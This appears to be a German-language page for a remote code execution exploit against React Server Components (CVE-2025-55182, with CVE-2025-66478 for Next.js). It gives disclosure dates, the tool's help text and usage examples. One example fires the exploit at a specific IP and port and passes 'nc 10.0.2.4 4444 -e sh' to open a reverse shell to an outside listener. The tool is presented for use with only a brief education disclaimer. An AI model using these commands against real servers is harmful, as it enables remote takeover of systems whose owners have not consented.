
CVE-2025-55182 Exploit | by infrar3d
Exploited von infrar3d
Eine kritische Sicherheitslücke mit Schweregrad 10.0, die die serverseitige Nutzung von React.js betrifft, verfolgt als CVE-2025-55182 in React.js und CVE-2025-66478 speziell für das Next.js-Framework.
Diese Schwachstelle wurde am 29. November 2025 PT von Lachlan Davidson verantwortungsvoll an das Meta-Team offengelegt. Die erste Offenlegung und der Patch-Release erfolgten durch React und Vercel am 3. Dezember 2025 PT. (Original: https://react2shell.com/)
python3 CVE-2025-55182.py --help
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]
CVE-2025-55182 - React Server Components RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target URL (required)
-c, --command COMMAND
Command to execute on target (default: id)
Example: python CVE-2025-55182.py -u http://target.com -c "whoami"
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"
Diese Software und der Proof-of-Concept-Code werden ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt.
Sie sind dafür verantwortlich, alle geltenden Gesetze einzuhalten. Ethisch und verantwortungsvoll verwenden.